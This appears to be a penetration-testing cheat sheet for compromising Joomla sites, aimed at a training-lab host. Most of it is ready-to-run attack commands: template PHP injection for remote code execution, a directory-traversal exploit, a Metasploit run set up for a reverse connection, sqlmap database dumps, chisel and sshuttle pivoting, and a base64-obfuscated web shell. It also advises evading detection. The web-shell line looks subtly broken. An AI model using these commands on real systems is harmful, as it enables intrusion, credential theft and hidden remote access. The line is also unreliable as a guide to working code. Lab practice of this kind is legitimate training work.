abuse

1. Joomla Admin Panel Code Execution (Template Customization)

curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id

• Log in to /administrator with admin credentials.

• Modify template files to inject PHP code for RCE.

• Use non-standard parameters and clean up web shells.

2. Joomla Core Directory Traversal (CVE-2019-10945)

python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /

• Exploits directory traversal and file deletion.

• Useful if admin panel is inaccessible from outside.

• Can reveal sensitive files like configuration.php.

3. Joomla Configuration File Exploitation (Manual, if accessible)

curl -s http://dev.inlanefreight.local/configuration.php

• Check for exposed configuration.php file.

• Extract database credentials and sensitive information.

4. Joomla Extension Exploitation (Manual)

curl -s http://dev.inlanefreight.local/components/[vulnerable_component]/[exploit_path]?param=[malicious_payload]

• Enumerate extensions and research vulnerabilities.

• Craft exploits based on identified flaws.

• Extensions are a very common attack vector.

5. Metasploit Joomla Modules (if applicable)

msf6 > search joomla
msf6 > use exploit/unix/webapp/joomla_...
msf6 > set RHOSTS dev.inlanefreight.local
msf6 > set RPORT 80
msf6 > set TARGETURI /administrator/
msf6 > set USERNAME admin
msf6 > set PASSWORD admin
msf6 > set LHOST [your_ip]
msf6 > set LPORT 4444
msf6 > exploit

• Use Metasploit for automated exploitation.

• Streamlines the process for known vulnerabilities.

6. Database Exploitation (if SQL injection is achieved)

sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" --dbs --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] --tables --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch

• Use SQLMap or manual techniques to dump the database.

• Extract credentials and sensitive information.

7. Post-Exploitation (Privilege Escalation, Lateral Movement)

• Linux: linpeas.sh

• Windows: winpeas.exe

• Pivoting:

chisel server -p 1080 --reverse & chisel client [target_ip]:1080 R:socks
sshuttle -r user@target_ip 0.0.0.0/0

• Enumerate the compromised system.

• Use as a pivot point for lateral movement.

8. Joomla Rest API Attacks

curl -s http://dev.inlanefreight.local/api/index.php/v1/users

• Attack the Joomla REST API if enabled.

• Enumerate users, or modify content.

9. Advanced Web Shell Techniques

php -r '$s="c3lzdGVtKCRfR0VUWyJjbWQiXSk7";eval(base64_decode($s));' > shell.php

• Obfuscate web shells to evade detection.

• Implement authentication mechanisms.

10. Client-Side Attacks (XSS)

curl "http://dev.inlanefreight.local/index.php?param=<script>alert(1)</script>"

• Test for XSS vulnerabilities.

• Attack the users of the web site.

11. Joomla CLI (if accessible)

joomla user:list

• If you have shell access, you can use the Joomla CLI.

Important Things:

• Extension Vulnerabilities: Prioritize extension enumeration and testing.

• Configuration Exposure: Check for and protect configuration.php.

• Web Shell Security: Use obfuscation and cleanup.

• Reporting: Document all findings and actions.

• Stay Updated: Keep up with Joomla security advisories.